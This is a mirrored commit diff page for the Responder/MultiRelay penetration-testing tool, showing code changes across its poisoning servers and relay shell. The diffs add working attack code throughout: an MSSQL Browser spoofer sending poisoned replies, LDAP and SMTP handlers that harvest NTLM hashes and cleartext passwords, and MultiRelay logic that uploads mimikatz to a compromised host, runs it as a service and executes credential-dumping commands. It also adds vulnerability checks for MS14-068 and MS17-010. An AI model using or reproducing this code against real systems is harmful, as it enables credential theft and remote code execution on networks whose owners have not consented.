mirror of
https://github.com/lgandx/Responder.git
synced 2026-01-01 12:29:05 +00:00
Compare commits
14 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
b37f56264a | ||
|
|
207b0d455c | ||
|
|
679cf65cff | ||
|
|
be26b504b5 | ||
|
|
75aa21bbb9 | ||
|
|
ffca0e2a92 | ||
|
33bde41902 | ||
|
|
95c0d6e673 | ||
|
|
0436b47a2c | ||
|
5859c31e8e | ||
|
bc90f8fe27 | ||
|
|
bff935e71e | ||
|
|
38219e249e | ||
|
|
2223ef6689 |
22
README.md
22
README.md
@@ -1,6 +1,6 @@
|
||||
# Responder.py #
|
||||
# Responder/MultiRelay #
|
||||
|
||||
LLMNR/NBT-NS/mDNS Poisoner
|
||||
LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay.
|
||||
|
||||
Author: Laurent Gaffie <laurent.gaffie@gmail.com > https://g-laurent.blogspot.com
|
||||
|
||||
@@ -89,7 +89,7 @@ Additionally, all captured hashed are logged into an SQLite database which you c
|
||||
|
||||
## Considerations ##
|
||||
|
||||
- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553.
|
||||
- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, UDP 1434, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553.
|
||||
|
||||
- If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports.
|
||||
|
||||
@@ -169,6 +169,22 @@ You can contribute to this project by donating to the following BTC address:
|
||||
1Pv9rZMNfy9hsW19eQhNGs22gY9sf6twjW
|
||||
|
||||
|
||||
## Acknowledgments ##
|
||||
|
||||
Late Responder development has been possible because of the donations received from individuals and companies.
|
||||
|
||||
We would like to thanks those major donator:
|
||||
|
||||
- SecureWorks : https://www.secureworks.com/
|
||||
|
||||
- Black Hills Information Security: http://www.blackhillsinfosec.com/
|
||||
|
||||
- TrustedSec: https://www.trustedsec.com/
|
||||
|
||||
- And all, ALL the pentesters around the world who donated to this project.
|
||||
|
||||
Thank you.
|
||||
|
||||
## Copyright ##
|
||||
|
||||
NBT-NS/LLMNR Responder
|
||||
|
||||
@@ -268,8 +268,9 @@ def main():
|
||||
threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,)))
|
||||
|
||||
if settings.Config.SQL_On_Off:
|
||||
from servers.MSSQL import MSSQL
|
||||
from servers.MSSQL import MSSQL, MSSQLBrowser
|
||||
threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,)))
|
||||
threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 1434, MSSQLBrowser,)))
|
||||
|
||||
if settings.Config.FTP_On_Off:
|
||||
from servers.FTP import FTP
|
||||
|
||||
102
servers/LDAP.py
102
servers/LDAP.py
@@ -27,37 +27,53 @@ def ParseSearch(data):
|
||||
elif re.search(r'(?i)(objectClass0*.*supportedSASLMechanisms)', data):
|
||||
return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
|
||||
|
||||
def ParseLDAPHash(data, client):
|
||||
SSPIStart = data[42:]
|
||||
LMhashLen = struct.unpack('<H',data[54:56])[0]
|
||||
def ParseLDAPHash(data,client, Challenge): #Parse LDAP NTLMSSP v1/v2
|
||||
SSPIStart = data.find('NTLMSSP')
|
||||
SSPIString = data[SSPIStart:]
|
||||
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
|
||||
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
|
||||
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
||||
NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
|
||||
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
|
||||
|
||||
if LMhashLen > 10:
|
||||
LMhashOffset = struct.unpack('<H',data[58:60])[0]
|
||||
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
||||
|
||||
NthashLen = struct.unpack('<H',data[64:66])[0]
|
||||
NthashOffset = struct.unpack('<H',data[66:68])[0]
|
||||
NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
||||
|
||||
DomainLen = struct.unpack('<H',data[72:74])[0]
|
||||
DomainOffset = struct.unpack('<H',data[74:76])[0]
|
||||
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
||||
|
||||
UserLen = struct.unpack('<H',data[80:82])[0]
|
||||
UserOffset = struct.unpack('<H',data[82:84])[0]
|
||||
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
|
||||
|
||||
WriteHash = User + "::" + Domain + ":" + LMHash + ":" + NtHash + ":" + Challenge.encode('hex')
|
||||
if NthashLen == 24:
|
||||
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
||||
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
|
||||
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
|
||||
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
|
||||
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
|
||||
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
|
||||
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
|
||||
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, Challenge.encode('hex'))
|
||||
|
||||
SaveToDb({
|
||||
'module': 'LDAP',
|
||||
'type': 'NTLMv1',
|
||||
'client': client,
|
||||
'user': Domain+'\\'+User,
|
||||
'hash': NtHash,
|
||||
'module': 'LDAP',
|
||||
'type': 'NTLMv1-SSP',
|
||||
'client': client,
|
||||
'user': Domain+'\\'+Username,
|
||||
'hash': SMBHash,
|
||||
'fullhash': WriteHash,
|
||||
})
|
||||
|
||||
|
||||
if NthashLen > 60:
|
||||
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
||||
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
|
||||
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
|
||||
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
|
||||
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
|
||||
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
|
||||
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
|
||||
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), SMBHash[:32], SMBHash[32:])
|
||||
|
||||
SaveToDb({
|
||||
'module': 'LDAP',
|
||||
'type': 'NTLMv2',
|
||||
'client': client,
|
||||
'user': Domain+'\\'+Username,
|
||||
'hash': SMBHash,
|
||||
'fullhash': WriteHash,
|
||||
})
|
||||
|
||||
if LMhashLen < 2 and settings.Config.Verbose:
|
||||
print text("[LDAP] Ignoring anonymous NTLM authentication")
|
||||
|
||||
@@ -67,7 +83,7 @@ def ParseNTLM(data,client, Challenge):
|
||||
NTLMChall.calculate()
|
||||
return str(NTLMChall)
|
||||
elif re.search('(NTLMSSP\x00\x03\x00\x00\x00)', data):
|
||||
ParseLDAPHash(data,client)
|
||||
ParseLDAPHash(data, client, Challenge)
|
||||
|
||||
def ParseLDAPPacket(data, client, Challenge):
|
||||
if data[1:2] == '\x84':
|
||||
@@ -102,19 +118,37 @@ def ParseLDAPPacket(data, client, Challenge):
|
||||
elif Operation == "\x63":
|
||||
Buffer = ParseSearch(data)
|
||||
return Buffer
|
||||
|
||||
elif settings.Config.Verbose:
|
||||
print text('[LDAP] Operation not supported')
|
||||
|
||||
if data[5:6] == '\x60':
|
||||
UserLen = struct.unpack("<b",data[11:12])[0]
|
||||
UserString = data[12:12+UserLen]
|
||||
PassLen = struct.unpack("<b",data[12+UserLen+1:12+UserLen+2])[0]
|
||||
PassStr = data[12+UserLen+2:12+UserLen+3+PassLen]
|
||||
if settings.Config.Verbose:
|
||||
print text('[LDAP] Attempting to parse an old simple Bind request.')
|
||||
SaveToDb({
|
||||
'module': 'LDAP',
|
||||
'type': 'Cleartext',
|
||||
'client': client,
|
||||
'user': UserString,
|
||||
'cleartext': PassStr,
|
||||
'fullhash': UserString+':'+PassStr,
|
||||
})
|
||||
|
||||
class LDAP(BaseRequestHandler):
|
||||
def handle(self):
|
||||
try:
|
||||
while True:
|
||||
self.request.settimeout(0.5)
|
||||
data = self.request.recv(8092)
|
||||
Challenge = RandomChallenge()
|
||||
self.request.settimeout(0.4)
|
||||
data = self.request.recv(8092)
|
||||
Challenge = RandomChallenge()
|
||||
for x in range(5):
|
||||
Buffer = ParseLDAPPacket(data,self.client_address[0], Challenge)
|
||||
|
||||
if Buffer:
|
||||
self.request.send(Buffer)
|
||||
except socket.timeout:
|
||||
pass
|
||||
data = self.request.recv(8092)
|
||||
except:
|
||||
pass
|
||||
|
||||
|
||||
@@ -17,6 +17,7 @@
|
||||
from SocketServer import BaseRequestHandler
|
||||
from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
|
||||
from utils import *
|
||||
import random
|
||||
import struct
|
||||
|
||||
class TDS_Login_Packet:
|
||||
@@ -119,33 +120,59 @@ def ParseClearTextSQLPass(data, client):
|
||||
# MSSQL Server class
|
||||
class MSSQL(BaseRequestHandler):
|
||||
def handle(self):
|
||||
if settings.Config.Verbose:
|
||||
print text("[MSSQL] Received connection from %s" % self.client_address[0])
|
||||
|
||||
try:
|
||||
while True:
|
||||
data = self.request.recv(1024)
|
||||
self.request.settimeout(0.1)
|
||||
Challenge = RandomChallenge()
|
||||
data = self.request.recv(1024)
|
||||
if settings.Config.Verbose:
|
||||
print text("[MSSQL] Received connection from %s" % self.client_address[0])
|
||||
|
||||
if data[0] == "\x12": # Pre-Login Message
|
||||
Buffer = str(MSSQLPreLoginAnswer())
|
||||
if data[0] == "\x12": # Pre-Login Message
|
||||
Buffer = str(MSSQLPreLoginAnswer())
|
||||
self.request.send(Buffer)
|
||||
data = self.request.recv(1024)
|
||||
|
||||
if data[0] == "\x10": # NegoSSP
|
||||
if re.search("NTLMSSP",data):
|
||||
Challenge = RandomChallenge()
|
||||
Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge)
|
||||
Packet.calculate()
|
||||
Buffer = str(Packet)
|
||||
self.request.send(Buffer)
|
||||
data = self.request.recv(1024)
|
||||
else:
|
||||
ParseClearTextSQLPass(data,self.client_address[0])
|
||||
|
||||
if data[0] == "\x10": # NegoSSP
|
||||
if re.search("NTLMSSP",data):
|
||||
Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge)
|
||||
Packet.calculate()
|
||||
Buffer = str(Packet)
|
||||
self.request.send(Buffer)
|
||||
data = self.request.recv(1024)
|
||||
else:
|
||||
ParseClearTextSQLPass(data,self.client_address[0])
|
||||
|
||||
if data[0] == "\x11": # NegoSSP Auth
|
||||
ParseSQLHash(data,self.client_address[0])
|
||||
if data[0] == "\x11": # NegoSSP Auth
|
||||
ParseSQLHash(data,self.client_address[0],Challenge)
|
||||
|
||||
except:
|
||||
self.request.close()
|
||||
pass
|
||||
|
||||
# MSSQL Server Browser class
|
||||
# See "[MC-SQLR]: SQL Server Resolution Protocol": https://msdn.microsoft.com/en-us/library/cc219703.aspx
|
||||
class MSSQLBrowser(BaseRequestHandler):
|
||||
def handle(self):
|
||||
if settings.Config.Verbose:
|
||||
print text("[MSSQL-BROWSER] Received request from %s" % self.client_address[0])
|
||||
|
||||
data, soc = self.request
|
||||
|
||||
if data:
|
||||
if data[0] in "\x02\x03": # CLNT_BCAST_EX / CLNT_UCAST_EX
|
||||
self.send_response(soc, "MSSQLSERVER")
|
||||
elif data[0] == "\x04": # CLNT_UCAST_INST
|
||||
self.send_response(soc, data[1:].rstrip("\x00"))
|
||||
elif data[0] == "\x0F": # CLNT_UCAST_DAC
|
||||
self.send_dac_response(soc)
|
||||
|
||||
def send_response(self, soc, inst):
|
||||
print text("[MSSQL-BROWSER] Sending poisoned response to %s" % self.client_address[0])
|
||||
|
||||
server_name = ''.join(chr(random.randint(ord('A'), ord('Z'))) for _ in range(random.randint(12, 20)))
|
||||
resp = "ServerName;%s;InstanceName;%s;IsClustered;No;Version;12.00.4100.00;tcp;1433;;" % (server_name, inst)
|
||||
soc.sendto(struct.pack("<BH", 0x05, len(resp)) + resp, self.client_address)
|
||||
|
||||
def send_dac_response(self, soc):
|
||||
print text("[MSSQL-BROWSER] Sending poisoned DAC response to %s" % self.client_address[0])
|
||||
|
||||
soc.sendto(struct.pack("<BHBH", 0x05, 0x06, 0x01, 1433), self.client_address)
|
||||
|
||||
@@ -26,28 +26,16 @@ class ESMTP(BaseRequestHandler):
|
||||
self.request.send(str(SMTPGreeting()))
|
||||
data = self.request.recv(1024)
|
||||
|
||||
if data[0:4] == "EHLO":
|
||||
if data[0:4] == "EHLO" or data[0:4] == "ehlo":
|
||||
self.request.send(str(SMTPAUTH()))
|
||||
data = self.request.recv(1024)
|
||||
|
||||
if data[0:4] == "AUTH":
|
||||
self.request.send(str(SMTPAUTH1()))
|
||||
data = self.request.recv(1024)
|
||||
|
||||
if data:
|
||||
try:
|
||||
User = filter(None, b64decode(data).split('\x00'))
|
||||
Username = User[0]
|
||||
Password = User[1]
|
||||
except:
|
||||
Username = b64decode(data)
|
||||
|
||||
self.request.send(str(SMTPAUTH2()))
|
||||
data = self.request.recv(1024)
|
||||
|
||||
if data:
|
||||
try: Password = b64decode(data)
|
||||
except: Password = data
|
||||
AuthPlain = re.findall(r'(?<=AUTH PLAIN )[^\r]*', data)
|
||||
if AuthPlain:
|
||||
User = filter(None, b64decode(AuthPlain[0]).split('\x00'))
|
||||
Username = User[0]
|
||||
Password = User[1]
|
||||
|
||||
SaveToDb({
|
||||
'module': 'SMTP',
|
||||
@@ -56,7 +44,36 @@ class ESMTP(BaseRequestHandler):
|
||||
'user': Username,
|
||||
'cleartext': Password,
|
||||
'fullhash': Username+":"+Password,
|
||||
})
|
||||
})
|
||||
|
||||
else:
|
||||
self.request.send(str(SMTPAUTH1()))
|
||||
data = self.request.recv(1024)
|
||||
|
||||
if data:
|
||||
try:
|
||||
User = filter(None, b64decode(data).split('\x00'))
|
||||
Username = User[0]
|
||||
Password = User[1]
|
||||
except:
|
||||
Username = b64decode(data)
|
||||
|
||||
self.request.send(str(SMTPAUTH2()))
|
||||
data = self.request.recv(1024)
|
||||
|
||||
if data:
|
||||
try: Password = b64decode(data)
|
||||
except: Password = data
|
||||
|
||||
SaveToDb({
|
||||
'module': 'SMTP',
|
||||
'type': 'Cleartext',
|
||||
'client': self.client_address[0],
|
||||
'user': Username,
|
||||
'cleartext': Password,
|
||||
'fullhash': Username+":"+Password,
|
||||
})
|
||||
|
||||
except Exception:
|
||||
raise
|
||||
pass
|
||||
|
||||
0
tools/DHCP_Auto.sh
Normal file → Executable file
0
tools/DHCP_Auto.sh
Normal file → Executable file
@@ -33,8 +33,12 @@ def GetBootTime(data):
|
||||
def IsDCVuln(t):
|
||||
Date = datetime.datetime(2014, 11, 17, 0, 30)
|
||||
if t[0] < Date:
|
||||
print "DC is up since:", t[1]
|
||||
print "This DC is vulnerable to MS14-068"
|
||||
print "System is up since:", t[1]
|
||||
print "This system may be vulnerable to MS14-068"
|
||||
Date = datetime.datetime(2017, 03, 14, 0, 30)
|
||||
if t[0] < Date:
|
||||
print "System is up since:", t[1]
|
||||
print "This system may be vulnerable to MS17-010"
|
||||
print "DC is up since:", t[1]
|
||||
|
||||
|
||||
@@ -63,6 +67,6 @@ def run(host):
|
||||
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv)<=1:
|
||||
sys.exit('Usage: python '+sys.argv[0]+' DC-IP-address')
|
||||
sys.exit('Usage: python '+sys.argv[0]+' System-IP-address')
|
||||
host = sys.argv[1],445
|
||||
run(host)
|
||||
|
||||
@@ -45,9 +45,10 @@ from socket import *
|
||||
__version__ = "2.0"
|
||||
|
||||
|
||||
MimikatzFilename = "./MultiRelay/bin/mimikatz.exe"
|
||||
RunAsFileName = "./MultiRelay/bin/Runas.exe"
|
||||
SysSVCFileName = "./MultiRelay/bin/Syssvc.exe"
|
||||
MimikatzFilename = "./MultiRelay/bin/mimikatz.exe"
|
||||
Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe"
|
||||
RunAsFileName = "./MultiRelay/bin/Runas.exe"
|
||||
SysSVCFileName = "./MultiRelay/bin/Syssvc.exe"
|
||||
|
||||
|
||||
def UserCallBack(op, value, dmy, parser):
|
||||
@@ -130,7 +131,8 @@ def ShowHelp():
|
||||
print color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)'
|
||||
print color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to'
|
||||
print color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)'
|
||||
print color('mimi command',8,1)+' -> Run a remote Mimikatz command (eg: mimi coffee)'
|
||||
print color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)'
|
||||
print color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)'
|
||||
print color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)'
|
||||
print color('help',8,1)+' -> Print this message.'
|
||||
print color('exit',8,1)+' -> Exit this shell and return in relay mode.'
|
||||
@@ -574,6 +576,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
|
||||
else:
|
||||
print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n"
|
||||
ShowHelp()
|
||||
Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired")
|
||||
print color('Connected to %s as LocalSystem.'%(Target[0]),2,1)
|
||||
|
||||
while True:
|
||||
@@ -608,6 +611,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
|
||||
RunAs = re.findall('^runas (.*)$', Cmd[0])
|
||||
LCmd = re.findall('^lcmd (.*)$', Cmd[0])
|
||||
Mimi = re.findall('^mimi (.*)$', Cmd[0])
|
||||
Mimi32 = re.findall('^mimi32 (.*)$', Cmd[0])
|
||||
Scan = re.findall('^scan (.*)$', Cmd[0])
|
||||
Pivot = re.findall('^pivot (.*)$', Cmd[0])
|
||||
Help = re.findall('^help', Cmd[0])
|
||||
@@ -684,6 +688,18 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
|
||||
print MimikatzFilename+" does not exist, please specify a valid file."
|
||||
del Cmd[:]
|
||||
|
||||
if Mimi32:
|
||||
if os.path.isfile(Mimikatzx86Filename):
|
||||
FileSize, FileContent = UploadContent(Mimikatzx86Filename)
|
||||
FileName = os.path.basename(Mimikatzx86Filename)
|
||||
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
|
||||
Exec = Mimi32[0]
|
||||
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
|
||||
del Cmd[:]
|
||||
else:
|
||||
print Mimikatzx86Filename+" does not exist, please specify a valid file."
|
||||
del Cmd[:]
|
||||
|
||||
if Pivot:
|
||||
if Pivot[0] == Target[0]:
|
||||
print "[Pivot Verification Failed]: You're already on this host. No need to pivot."
|
||||
|
||||
@@ -19,9 +19,11 @@ import sys
|
||||
import random
|
||||
import time
|
||||
import os
|
||||
import binascii
|
||||
import re
|
||||
import datetime
|
||||
import threading
|
||||
import uuid
|
||||
from RelayMultiPackets import *
|
||||
from odict import OrderedDict
|
||||
from base64 import b64decode, b64encode
|
||||
@@ -371,6 +373,16 @@ def GenerateServiceName():
|
||||
def GenerateServiceID():
|
||||
return''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
|
||||
|
||||
def GenerateNamedPipeName():
|
||||
return''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(random.randint(3, 30))])
|
||||
|
||||
def Generateuuid():
|
||||
RandomStr = binascii.b2a_hex(os.urandom(16))
|
||||
x = uuid.UUID(bytes_le=RandomStr.decode('hex'))
|
||||
DisplayGUID = uuid.UUID(RandomStr)
|
||||
DisplayGUIDle = x.bytes
|
||||
return str(DisplayGUID), str(DisplayGUIDle)
|
||||
|
||||
###
|
||||
#SMBRelay grab
|
||||
###
|
||||
@@ -542,7 +554,7 @@ def MimiKatzRPC(Command, f, host, data, s):
|
||||
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
||||
w = SMBDCEMimiKatzRPCCommand(CMD=Command)
|
||||
w.calculate()
|
||||
x = SMBDCEPacketData(Data=w, Opnum="\x00\x00")
|
||||
x = SMBDCEPacketData(Data=w, Opnum="\x03\x00")
|
||||
x.calculate()
|
||||
t = SMBDCERPCWriteData(FID=f,Data=x)
|
||||
t.calculate()
|
||||
@@ -1925,10 +1937,12 @@ def InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, Fi
|
||||
global MimiKatzSVCID
|
||||
global MimiKatzSVCName
|
||||
try:
|
||||
DisplayGUID, DisplayGUIDle = Generateuuid()
|
||||
NamedPipe = GenerateNamedPipeName()
|
||||
RandomFName = GenerateRandomFileName()
|
||||
WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt"
|
||||
#Install mimikatz as a service.
|
||||
Command = "c:\\Windows\\Temp\\"+FileName+" \"rpc::server /protseq:ncacn_np /endpoint:\pipe\wtf /noreg\" service::me exit"
|
||||
Command = "c:\\Windows\\Temp\\"+FileName+" \"rpc::server /protseq:ncacn_np /endpoint:\pipe\\"+NamedPipe+" /guid:{"+DisplayGUID+"} /noreg\" service::me exit"
|
||||
MimiKatzSVCName = GenerateServiceName()
|
||||
MimiKatzSVCID = GenerateServiceID()
|
||||
|
||||
@@ -1940,7 +1954,7 @@ def InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, Fi
|
||||
Logs.info('Command executed:')
|
||||
Logs.info(clientIP+","+Username+','+Command)
|
||||
|
||||
return data
|
||||
return data, DisplayGUIDle, NamedPipe
|
||||
|
||||
except:
|
||||
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
|
||||
@@ -1949,13 +1963,14 @@ def InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, Fi
|
||||
|
||||
def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName):
|
||||
try:
|
||||
InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName)
|
||||
data,s = SMBOpenPipe(Host, data, s)
|
||||
data,guid,namedpipe = InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName)
|
||||
data,s = SMBOpenPipe(Host, data, s)
|
||||
##Wait for the pipe to come up..
|
||||
time.sleep(1)
|
||||
data,s,f = BindCall("\xe9\x11\xfc\x17\x58\xc2\x8d\x4b\x8d\x07\x2f\x41\x25\x15\x62\x44", "\x01\x00", "\\wtf", data, s)
|
||||
data,s,f = MimiKatzRPC(Command, f, Host, data, s)
|
||||
data,s = SMBDCERPCCloseFID(f, data,s)
|
||||
|
||||
data,s,f = BindCall(guid, "\x01\x00", "\\"+namedpipe, data, s)
|
||||
data,s,f = MimiKatzRPC(Command, f, Host, data, s)
|
||||
data,s = SMBDCERPCCloseFID(f, data,s)
|
||||
#####
|
||||
#Kill the SVC now... Never know when the user will leave, so lets not leave anything on the target.
|
||||
data,s = SMBOpenPipe(Host, data, s)
|
||||
@@ -1972,7 +1987,7 @@ def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileNam
|
||||
return ModifySMBRetCode(data)
|
||||
except:
|
||||
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
|
||||
print "[+] Something went wrong while calling mimikatz. Did you run install mimi before launching this command?"
|
||||
print "[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32."
|
||||
return ModifySMBRetCode(data)
|
||||
|
||||
##########Pivot#############
|
||||
|
||||
Binary file not shown.
Binary file not shown.
@@ -20,6 +20,7 @@ import multiprocessing
|
||||
from socket import *
|
||||
from odict import OrderedDict
|
||||
import optparse
|
||||
from RunFingerPackets import *
|
||||
|
||||
__version__ = "0.7"
|
||||
|
||||
@@ -61,82 +62,6 @@ def GetBootTime(data):
|
||||
time = datetime.datetime.fromtimestamp(t[0])
|
||||
return time, time.strftime('%Y-%m-%d %H:%M:%S')
|
||||
|
||||
class SMBHeader(Packet):
|
||||
fields = OrderedDict([
|
||||
("proto", "\xff\x53\x4d\x42"),
|
||||
("cmd", "\x72"),
|
||||
("error-code", "\x00\x00\x00\x00" ),
|
||||
("flag1", "\x00"),
|
||||
("flag2", "\x00\x00"),
|
||||
("pidhigh", "\x00\x00"),
|
||||
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
||||
("reserved", "\x00\x00"),
|
||||
("tid", "\x00\x00"),
|
||||
("pid", "\x00\x00"),
|
||||
("uid", "\x00\x00"),
|
||||
("mid", "\x00\x00"),
|
||||
])
|
||||
|
||||
class SMBNego(Packet):
|
||||
fields = OrderedDict([
|
||||
("Wordcount", "\x00"),
|
||||
("Bcc", "\x62\x00"),
|
||||
("Data", "")
|
||||
])
|
||||
|
||||
def calculate(self):
|
||||
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
|
||||
|
||||
class SMBNegoData(Packet):
|
||||
fields = OrderedDict([
|
||||
("BuffType","\x02"),
|
||||
("Dialect", "NT LM 0.12\x00"),
|
||||
])
|
||||
|
||||
|
||||
class SMBSessionFingerData(Packet):
|
||||
fields = OrderedDict([
|
||||
("wordcount", "\x0c"),
|
||||
("AndXCommand", "\xff"),
|
||||
("reserved","\x00" ),
|
||||
("andxoffset", "\x00\x00"),
|
||||
("maxbuff","\x04\x11"),
|
||||
("maxmpx", "\x32\x00"),
|
||||
("vcnum","\x00\x00"),
|
||||
("sessionkey", "\x00\x00\x00\x00"),
|
||||
("securitybloblength","\x4a\x00"),
|
||||
("reserved2","\x00\x00\x00\x00"),
|
||||
("capabilities", "\xd4\x00\x00\xa0"),
|
||||
("bcc1","\xb1\x00"), #hardcoded len here and hardcoded packet below, no calculation, faster.
|
||||
("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
|
||||
])
|
||||
|
||||
##Now Lanman
|
||||
class SMBHeaderLanMan(Packet):
|
||||
fields = OrderedDict([
|
||||
("proto", "\xff\x53\x4d\x42"),
|
||||
("cmd", "\x72"),
|
||||
("error-code", "\x00\x00\x00\x00" ),
|
||||
("flag1", "\x08"),
|
||||
("flag2", "\x01\xc8"),
|
||||
("pidhigh", "\x00\x00"),
|
||||
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
||||
("reserved", "\x00\x00"),
|
||||
("tid", "\x00\x00"),
|
||||
("pid", "\x3c\x1b"),
|
||||
("uid", "\x00\x00"),
|
||||
("mid", "\x00\x00"),
|
||||
])
|
||||
|
||||
#We grab the domain and hostname from the negotiate protocol answer, since it is in a Lanman dialect format.
|
||||
class SMBNegoDataLanMan(Packet):
|
||||
fields = OrderedDict([
|
||||
("Wordcount", "\x00"),
|
||||
("Bcc", "\x0c\x00"),#hardcoded len here and hardcoded packet below, no calculation, faster.
|
||||
("BuffType","\x02"),
|
||||
("Dialect", "NT LM 0.12\x00"),
|
||||
|
||||
])
|
||||
|
||||
#####################
|
||||
|
||||
@@ -181,7 +106,6 @@ def DomainGrab(Host):
|
||||
s.settimeout(Timeout)
|
||||
s.connect(Host)
|
||||
except:
|
||||
print "Host down or port close, skipping"
|
||||
pass
|
||||
try:
|
||||
h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
|
||||
@@ -202,7 +126,6 @@ def SmbFinger(Host):
|
||||
s.settimeout(Timeout)
|
||||
s.connect(Host)
|
||||
except:
|
||||
print "Host down or port close, skipping"
|
||||
pass
|
||||
try:
|
||||
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
|
||||
@@ -220,28 +143,92 @@ def SmbFinger(Host):
|
||||
buffer1 = longueur(packet0)+packet0
